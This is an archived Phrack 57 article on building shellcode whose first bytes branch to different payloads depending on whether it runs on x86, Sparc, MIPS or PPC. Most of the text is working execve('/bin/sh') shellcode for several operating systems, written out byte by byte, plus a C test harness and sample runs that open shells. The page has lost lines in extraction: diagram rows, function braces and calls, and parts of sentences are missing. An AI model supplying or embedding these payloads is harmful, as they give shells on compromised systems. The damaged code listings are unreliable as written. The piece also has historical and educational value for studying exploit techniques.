AOH :: P57-0X0E.TXT

Phrack 57 File 14: Architecture spanning shellcode

                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x0e of 0x12

|=---------------=[ Architecture Spanning Shellcode ]=-------------------=|
|=--------------------=[ ]=-------------------------=|


  At defcon8 caezar's challenge 4 party [1] a problem was present to write
a shellcode that would run on two or more processor platforms. Below you
will find my solution (don't forget to check the credits section).

  The general idea behind an architecture spanning shellcode is trying
to come up with a sequence of bytes that would execute a jump instruction
on one architecture while executing a nop-like instruction on another
architecture. That way we can branch to architecture specific code
depending on the platform our code is running on.

  Here is an ASCII representation of our byte stream:

arch1 shellcode
arch2 shellcode

where XXX is a sequence of bytes that is going to branch to arch2's
shellcode on architecture 2 and is going to fall through to arch1
shellcode on architecture 1.

  If we want to add more platforms we would need to add additional
jump/nop instructions for each additional platform.

MIPS architecture

  A brief introduction to the MIPS architecture and writing MIPS shellcode
was described by scut in phrack 56 [2] as well as by the LSD folks in their
paper [8].

  The only thing that is worse repeating here is the general MIPS
instruction format. All MIPS instructions occupy 32 bits and the sixth most
significant bits specify the instruction opcode [6][7]. There are 3
instruction formats: I-Type (immediate), J-Type (Jump) and
R-Type (Register). Since we are looking for a nop-like instructions we are
mostly interesting in I and R type instructions whose format is listed

I-Type instruction format:

31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 .. 0
        op       |       rs     |        rt     | immediate

fields are:
	op		6-bit operation code
	rs		5-bit source register specifier
	rt		5-bit target (src/dest) or branch condition
	immediate	16-bit immediate, branch or address displacement

R-Type instruction format:

31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 14 131211|109876|5..0
        op       |       rs     |        rt     |      rd     | shamt|funct

fields are:
	op		6-bit operation code
	rs		5-bit source register specifier
	rt		5-bit target (src/dest) or branch condition
	rd		5-bit destination register specifier
	shamt		5-bit shift amount
	funct		6-bit function field

Sparc architecture

  Similarly to MIPS, Sparc is a RISC based architecture. All the Sparc
instructions occupy 32 bits and the two most significant bits specify an
instruction class [4]:

op	Instruction Class

00	Branch instructions
01	call instruction
10	Format Three instructions (type 1)
11	Format Three instructions (type 2)

  Format one call instruction contains an op field '01' followed by 30 bits
of address. Even though this is the optimal instruction to use, since we
control 30 bits out of 32, we won't be able to use it since the jumps are
not relative and tend to have 0 bytes in them.

  Format three instructions (type 2) are mostly load/store instructions
which are mostly useless to us since we are only looking for relatively
harmless nop-like instructions. We definitely don't want to use anything
that has possibility of crashing our program (SIGSEGV in case of an illegal

  This leaves us with branch and format three instructions (type 1) to use.
Here is the format of a format three instruction:

31 30 |29 28 27 26 25|24 23 22 21 20 19|18 17 16 15 14|13|12 11 10 9 8 7..0
  op  |       rd     |      op3        |       rs1    |01|    rs2 / imm

fields are:
	op		2-bit instruction class (10)
	rd		5-bit destination register specifier
	op3		5-bit instruction specifier
	rs1		5-bit source register
	0/1		1-bit constant / second source register option
	rs2 / imm	13-bit specifies either a second source register or
                               a constant

  Some of the promising looking (harmless) format three instructions are
add, and, or, xor and sll/srl (specified by op3 bits).

And here is the branch instruction format:

31 30 |29|28 27 26 25|24 23 22|21 .. 0
  op  |a | condition |   op2  |displacement

fields are:
	op		2-bit instruction class (00)
	a		1-bit annulled flag
	condition	5-bit condition specifier.. ba, bn, bl, ble, be, etc
	op2		3-bit condition code (integer condition code is 010)
	displacement	22-bit address displacement

  As you can see, a lot of the fields already have predefined values which
we need to work around.

PPC architecture

  PowerPC is yet another RISC architecture used by vendors such as IBM and
Apple. See LSD's paper [8] for more information.

x86 architecture

  The topic of buffer overflows and shellcode on x86 architecture has been
beaten to death before. For a good introduction see Aleph1's article in
phrack 49 [3].

  To expand just a little bit on the topic I am going to present x86 code
that works on multiple x86 operating systems. The idea behind an
"OS spanning" shellcode is to setup all the registers and stack in such a
way as to satisfy the requirements of all the operating systems that our
shellcode is meant to execute on. For example, BSD passes its parameters on
stack while Linux uses registers (for passing arguments to syscalls). If we
setup both registers and stack than our code would run on both BSD and
Linux x86 systems. The only problem with writing shellcode for BSD & Linux
systems is the different execve() syscall numbers the two systems use.
Linux uses syscall number 0xb while BSD uses 0x3b. To overcome this
problem, we need to distinguish between the two systems at runtime.
There are plenty of ways to do that such as checking where various segments
are mapped, the way segment registers are setup, etc. I chose to analyze
the segment registers since that method seems to be pretty robust. On Linux
systems, for example, segment registers fs and gs are set 0 (in user mode)
while on BSD systems they are set to non zero values (0x1f on OpenBSD,
0x2f on FreeBSD). We can exploit that difference to distinguish between the
two different systems. See "Adding more architectures" section for a
working example.

  Another way to to handle different syscall numbers is to ignore an
"invalid system call" SIGSYS signal and just try a different syscall number
if the first execve() call failed. While that method certainly works it
is quite limited and cannot be applied to other operating systems such as
the x86 Solaris which doesn't use the 0x80 interrupt trap gate.

  Note that the "OS Spanning" shellcode is certainly not restricted to an
x86 platform, the same idea can be applied to any hardware platform and any
operating system.

Putting it all together.. Architecture spanning shellcode

  As I have mentioned before our shellcode (first attempt) is going to look

arch1 shellcode
arch2 shellcode

where XXX is a specially crafted string that executes different
instructions on two different platforms.

  When I initially started looking for a working XXX string, I took an x86
short jump instruction and tried to decode it on a sun box. Since the
first byte of an x86 short jump instruction is 0xEB (which is almost all
1's) [5], the instruction decoded into a weird format 3 sparc instruction.
My next attempt consisted of writing a sparc jump instruction and trying to
decode it on an x86 platform. That idea almost worked but i was unable to
decode the sparc jump instruction into a nop-like x86 xor instruction due
to a one bit offset difference. The next attempt consisted of padding an
x86 jump instruction. Since an x86 short jump instruction is 2 bytes long
and all the sparc instructions are 4 bytes long, I had 2 bytes to play
with. I knew that I had to insert some bytes before the jump 0xEB byte in
order to be able to decode the instruction into something reasonable on
sparc. For my pad bytes I chose to use the x86 0x90 nop bytes which turned
out to be a good idea since 0x90 is mostly all 0's. My instruction stream
than looked like


where 0x90 is the x86 nop instruction, 0xEB is the opcode for an x86 short
jump and 0x30 is a 48 byte jump offset. Here is what the above string
decoded to on a Sun machine:

(gdb) x 0x1054c
0x1054c <main+20>:      0x9090eb30

(gdb) x/t 0x1054c
0x1054c <main+20>:      10010000100100001110101100110000

(gdb) x/i 0x1054c
0x1054c <main+20>:      orcc  %g3, 0xb30, %o0

  As you can see, our string decoded to a harmless format 3 'or'
instruction that corrupted the %o0 register. This is exactly what we were
looking for, a short jump on one architecture (x86) and a harmless
instruction on another architecture (sparc). With that in mind our
shellcode now looks like this:

[sparc shellcode]
[x86 shellcode]

Let's try it out..

[openbsd]$ cat ass.c		; ass as in Architecture Spanning Shellcode :)
char sc[] =
	/* magic string */

	/* sparc solaris execve() */
	"\x2d\x0b\xd8\x9a"                   /* sethi $0xbd89a, %l6        */
	"\xac\x15\xa1\x6e"                   /* or %l6, 0x16e, %l6         */
	"\x2f\x0b\xdc\xda"                   /* sethi $0xbdcda, %l7        */
	"\x90\x0b\x80\x0e"                   /* and %sp, %sp, %o0          */
	"\x92\x03\xa0\x08"                   /* add %sp, 8, %o1            */
	"\x94\x1a\x80\x0a"                   /* xor %o2, %o2, %o2          */
	"\x9c\x03\xa0\x10"                   /* add %sp, 0x10, %sp         */
	"\xec\x3b\xbf\xf0"                   /* std %l6, [%sp - 0x10]      */
	"\xdc\x23\xbf\xf8"                   /* st %sp, [%sp - 0x08]       */
	"\xc0\x23\xbf\xfc"                   /* st %g0, [%sp - 0x04]       */
	"\x82\x10\x20\x3b"                   /* mov $0x3b, %g1             */
	"\x91\xd0\x20\x08"                   /* ta 8                       */

	/* BSD execve() */
        "\xeb\x17"                      /* jmp */
        "\x5e"                          /* pop  %esi */
        "\x31\xc0"                      /* xor  %eax, %eax */
        "\x50"                          /* push %eax */
        "\x88\x46\x07"                  /* mov  %al,0x7(%esi) */
        "\x89\x46\x0c"                  /* mov  %eax,0xc(%esi) */
        "\x89\x76\x08"                  /* mov  %esi,0x8(%esi) */
        "\x8d\x5e\x08"                  /* lea  0x8(%esi),%ebx */
        "\x53"                          /* push %ebx */
        "\x56"                          /* push %esi */
        "\x50"                          /* push %eax */
        "\xb0\x3b"                      /* mov  $0x3b, %al */
        "\xcd\x80"                      /* int  $0x80 */
        "\xe8\xe4\xff\xff\xff"          /* call */
        "\x2f\x62\x69\x6e\x2f\x73\x68"; /* /bin/sh */

int main(void)
        void (*f)(void) = (void (*)(void)) sc;


        return 0;

[openbsd]$ gcc ass.c
[openbsd]$ ./a.out
$ uname -ms
OpenBSD i386

[solaris]$ gcc ass.c
[solaris]$ ./a.out
$ uname -ms
SunOS sun4u

it worked!

Adding more architectures

  Theoretically, spanning shellcode is not tied to any specific operating
system nor any specific hardware architecture. Thus it should be possible
to write shellcode that runs on more than two architectures. The format
for our shellcode (second attempt) that runs on 3 architectures is going
to be

arch1 shellcode
arch2 shellcode
arch3 shellcode

where arch1 is MIPS, arch2 is Sparc and arch3 is x86.

  My first attempt was to try and reuse the magic string from ass.c.
Unfortunately, 0x9090eb30 didn't decode into anything reasonable on an IRIX
platform and so I was forced to look elsewhere. My next attempt was to
replace 0x90 bytes with some other nop-like bytes looking for a sequence
that would work on both Sparc & MIPS platforms. After a trying out a bunch
of x86 nop instructions from K2's ADMmutate toolkit, I stumbled upon an AAA
instruction whose opcode was 0x37. The AAA instruction worked out great
since the 0x3737eb30 string decoded correctly on all three platforms:

	jmp +120

	sethi  %hi(0xdFADE000), %i3

	ori $s7,$t9,0xeb78

with XXX string out of the way, I was left with MIPS and Sparc platforms
YYY part. The very first instruction I tried worked on both platforms.
The instruction was a Sparc annulled short jump ba,a (0x30800012) which
decoded to

andi $zero,$a0,0x12

on a MIPS platform. Not only did the jump instruction decoded to a harmless
'andi' on a MIPS platform, it also didn't require a branch delay slot
instruction after it since the ba jump was annulled [4].
So now our shellcode looks like this

        "\x37\x37\xeb\x78"      /* x86:         aaa; aaa; jmp 116+4     */
                                /* MIPS:        ori $s7,$t9,0xeb78      */
                                /* Sparc:       sethi %hi(0xdfade000),%i3*/

        "\x30\x80\x00\x12"      /* MIPS:        andi $zero,$a0,0x12     */
                                /* Sparc:       ba,a +72                */

	[snip real shellcode]

  While we are adding more architectures to our shellcode let's also take
a look at PPC/AIX. The first logical thing to do is to try and decode
the existing XXX and YYY strings from the above shellcode on the PPC

(gdb) x 0x10000364
0x10000364 <main+36>:   0x3737eb78

(gdb) x/i 0x10000364
0x10000364 <main+36>:   addic.  r25,r23,-5256

(gdb) x/x 0x10000368
0x10000368 <main+40>:   0x30800012

(gdb) x/i 0x10000368
0x10000368 <main+40>:   addic   r4,r0,18

is this our lucky day or what? the XXX and YYY strings from the above
MIPS/x86/Sparc combo have correctly decoded to two harmless add
instructions. All we need to do now is to come up with another instruction
that is going to execute a jump on a MIPS platform while executing a nop on
PPC/AIX. After a bit of searching MIPS 'bgtz' instruction turned out to
decode into a valid multiply instruction on AIX:

(gdb) x 0x10001008
0x10001008 <sc+8>:      0x1ee00101

(gdb) x/i 0x10001008
0x10001008 <sc+8>:      bgtz $s7,0x10001410 <+1040>

(gdb) x 0x10000378
0x10000378 <main+56>:   0x1ee00101

(gdb) x/i 0x10000378
0x10000378 <main+56>:   mulli   r23,r0,257

the bgtz instruction is a branch on greater than zero [7]. Notice that the
branch instruction uses the $s7 register which was modified by us in a
previous nop instruction. The branch displacement is set to 0x0101 (to
avoid NULL bytes in the instruction) which is equivalent to a relative
1028 byte forward jump. Let's put everything together now..

[openbsd]$ cat ass.c

 * Architecture/OS Spanning Shellcode
 * runs on x86 (freebsd, netbsd, openbsd, linux), MIPS/Irix, Sparc/Solaris
 * and PPC/AIX (AIX platforms require -DAIX compiler flag)

char sc[] =
	/* voodoo */
	"\x37\x37\xeb\x7b"	/* x86:		aaa; aaa; jmp 116+4	*/
				/* MIPS:	ori	$s7,$t9,0xeb7b	*/
				/* Sparc:	sethi	%hi(0xdFADEc00), %i3 */
				/* PPC/AIX:	addic.	r25,r23,-5253	*/

	"\x30\x80\x01\x14"	/* MIPS:	andi	$zero,$a0,0x114	*/
				/* Sparc: 	ba,a	+1104		*/
				/* PPC/AIX:	addic   r4,r0,276	*/

	"\x1e\xe0\x01\x01"	/* MIPS:	bgtz	$s7, +1032	*/
				/* PPC/AIX:	mulli	r23,r0,257	*/

	"\x30\x80\x01\x14"	/* fill in the MIPS branch delay slot
				   with the above MIPS / AIX nop	*/

	/* PPC/AIX shellcode by LAST STAGE OF DELIRIUM	*://	*/
	"\x7e\x94\xa2\x79"	/* xor.		r20,r20,r20		*/
	"\x40\x82\xff\xfd"	/* bnel		<syscallcode>		*/
	"\x7e\xa8\x02\xa6"	/* mflr		r21			*/
	"\x3a\xc0\x01\xff"	/* lil		r22,0x1ff		*/
	"\x3a\xf6\xfe\x2d"	/* cal		r23,-467(r22)		*/
	"\x7e\xb5\xba\x14"	/* cax		r21,r21,r23		*/
	"\x7e\xa9\x03\xa6"	/* mtctr	r21			*/
	"\x4e\x80\x04\x20"	/* bctr					*/


	"\x4c\xc6\x33\x42"	/* crorc	cr6,cr6,cr6		*/
	"\x44\xff\xff\x02"	/* svca		0x0			*/
	"\x3a\xb5\xff\xf8"	/* cal		r21,-8(r21)		*/

	"\x7c\xa5\x2a\x79"	/* xor.		r5,r5,r5		*/
	"\x40\x82\xff\xfd"	/* bnel		<shellcode>		*/
	"\x7f\xe8\x02\xa6"	/* mflr		r31			*/
	"\x3b\xff\x01\x20"	/* cal		r31,0x120(r31)		*/
	"\x38\x7f\xff\x08"	/* cal		r3,-248(r31)		*/
	"\x38\x9f\xff\x10"	/* cal		r4,-240(r31)		*/
	"\x90\x7f\xff\x10"	/* st		r3,-240(r31)		*/
	"\x90\xbf\xff\x14"	/* st		r5,-236(r31)		*/
	"\x88\x55\xff\xf4"	/* lbz		r2,-12(r21)		*/
	"\x98\xbf\xff\x0f"	/* stb		r5,-241(r31)		*/
	"\x7e\xa9\x03\xa6"	/* mtctr	r21			*/
	"\x4e\x80\x04\x20"	/* bctr					*/

	/* x86 BSD/Linux execve() by me */
        "\xeb\x29"		/* jmp					*/
        "\x5e"			/* pop		%esi			*/
        "\x31\xc0"		/* xor		%eax, %eax		*/
        "\x50"			/* push		%eax 			*/
        "\x88\x46\x07"		/* mov		%al,0x7(%esi) 		*/
        "\x89\x46\x0c"		/* mov		%eax,0xc(%esi)		*/
        "\x89\x76\x08"		/* mov		%esi,0x8(%esi)		*/
        "\x8d\x5e\x08"		/* lea		0x8(%esi),%ebx		*/
        "\x53"			/* push		%ebx			*/
        "\x56"			/* push		%esi			*/
        "\x50"			/* push		%eax			*/

        /* setup registers for linux */
        "\x8d\x4e\x08"		/* lea		0x8(%esi),%ecx		*/
        "\x8d\x56\x08"		/* lea		0x8(%esi),%edx		*/
        "\x89\xf3"		/* mov		%esi, %ebx		*/

        /* distinguish between BSD & Linux */
        "\x8c\xe0"		/* movl		%fs, %eax		*/
        "\x21\xc0"		/* andl		%eax, %eax		*/
        "\x74\x04"		/* jz		+4			*/
        "\xb0\x3b"		/* mov		$0x3b, %al		*/
        "\xeb\x02"		/* jmp		+2			*/
        "\xb0\x0b"		/* mov		$0xb, %al		*/

        "\xcd\x80"		/* int		$0x80			*/

        "\xe8\xd2\xff\xff\xff"	/* call					*/
        "\x2f\x62\x69\x6e"	/* /bin					*/
	"\x2f\x73\x68"		/* /sh					*/

	 * pad the MIPS/Irix & Sparc/Solaris shellcodes
	 * jumps of > 0x0101 bytes are performed on both platforms
	 * to avoid NULL bytes in the jump instructions

        /* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso		*/
        "\xaf\xa0\xff\xfc"      /* sw           $zero, -4($sp)          */
        "\x24\x06\x73\x50"      /* li           $a2, 0x7350             */
        "\x04\xd0\xff\xff"      /* bltzal       $a2, dpatch             */
        "\x8f\xa6\xff\xfc"      /* lw           $a2, -4($sp)            */

        /* a2 = (char **) envp = NULL */
        "\x24\x0f\xff\xcb"      /* li           $t7, -53                */
        "\x01\xe0\x78\x27"      /* nor          $t7, $t7, $zero         */
        "\x03\xef\xf8\x21"      /* addu         $ra, $ra, $t7           */

        /* a0 = (char *) pathname */
        "\x23\xe4\xff\xf8"      /* addi         $a0, $ra, -8            */

        /* fix 0x42 dummy byte in pathname to shell */
        "\x8f\xed\xff\xfc"      /* lw           $t5, -4($ra)            */
        "\x25\xad\xff\xbe"      /* addiu        $t5, $t5, -66           */
        "\xaf\xed\xff\xfc"      /* sw           $t5, -4($ra)            */

        /* a1 = (char **) argv */
        "\xaf\xa4\xff\xf8"      /* sw           $a0, -8($sp)            */
        "\x27\xa5\xff\xf8"      /* addiu        $a1, $sp, -8            */

        "\x24\x02\x04\x23"      /* li           $v0, 1059 (SYS_execve)  */
        "\x01\x01\x01\x0c"      /* syscall                              */
        "\x2f\x62\x69\x6e"      /* .ascii       "/bin"                  */
        "\x2f\x73\x68\x42"      /* .ascii       "/sh", .byte 0xdummy    */

        /* Sparc Solaris execve() by an unknown author */
        "\x2d\x0b\xd8\x9a"	/* sethi	$0xbd89a, %l6           */
        "\xac\x15\xa1\x6e"	/* or		%l6, 0x16e, %l6         */
        "\x2f\x0b\xdc\xda"	/* sethi	$0xbdcda, %l7           */
        "\x90\x0b\x80\x0e"	/* and		%sp, %sp, %o0           */
        "\x92\x03\xa0\x08"	/* add		%sp, 8, %o1             */
        "\x94\x1a\x80\x0a"	/* xor		%o2, %o2, %o2           */
        "\x9c\x03\xa0\x10"	/* add		%sp, 0x10, %sp          */
        "\xec\x3b\xbf\xf0"	/* std		%l6, [%sp - 0x10]       */
        "\xdc\x23\xbf\xf8"	/* st		%sp, [%sp - 0x08]       */
        "\xc0\x23\xbf\xfc"	/* st		%g0, [%sp - 0x04]       */
        "\x82\x10\x20\x3b"	/* mov		$0x3b, %g1              */
        "\x91\xd0\x20\x08"	/* ta		8                       */

int main(void)
#if defined(AIX)
	/* copyright LAST STAGE OF DELIRIUM feb 2001 poland */
        int jump[2]={(int)sc,*((int*)&main+1)};

        ((*(void (*)())jump)());
        void (*f)(void) = (void (*)(void)) sc;


        return 0;

[openbsd]$ gcc ass.c
[openbsd]$ ./a.out
$ uname -ms
OpenBSD i386

[freebsd]$ gcc ass.c
[freebsd]$ ./a.out
$ uname -ms
FreeBSD i386

[linux]$ gcc ass.c
[linux]$ ./a.out
$ uname -ms
Linux i686

[solaris]$ gcc ass.c
[solaris]$ ./a.out
$ uname -ms
SunOS sun4u

[irix]$ gcc ass.c
[irix]$ ./a.out
$ uname -ms

[aix]$ gcc ass.c
[aix]$ ./a.out
$ uname -ms
AIX 000089101000


  Architecture spanning shellcode is a specially crafted code that executes
differently depending on the architecture it is being run on. The code
achieves that by using a series of bytes which execute differently on
different architectures.

  OS spanning shellcode is specially crafted code that executes on
multiple operating systems all running on the same platform. The code
achieves that by setting up the registers and the stack in a way that
satisfies the operating systems that the code is being run on.

Credits / Thanks

Greg Hoglund	working with me on this idea at the challenge party

prole and harm	for coming with an idea way before the challenge, GHI, skyper, spoonm


[1] Caezar's challenge

[2] Writing MIPS/IRIX shellcode
    scut (phrack 56)

[3] Smashing The Stack For Fun And Profit
    Aleph One (phrack 49)

[4] SPARC Architecture, Assembly Language Programming, and C. 2nd ed.
    Richard P. Paul

[5] IA-32 Intel Architecture, Software Developer's Manual
    Intel, Corp

[6] Computer Organization and Design
    David A. Patterson and John L. Hennessy

[7] MIPS RISC Architecture
    Gerry Kane and Joe Heinrich

[8] UNIX Assembly Codes Development for Vulnerabilities Illustration
    The Last Stage of Delirium Research Group

|=[ EOF ]=---------------------------------------------------------------=|

AOH Site layout & design copyright © 2006 AOH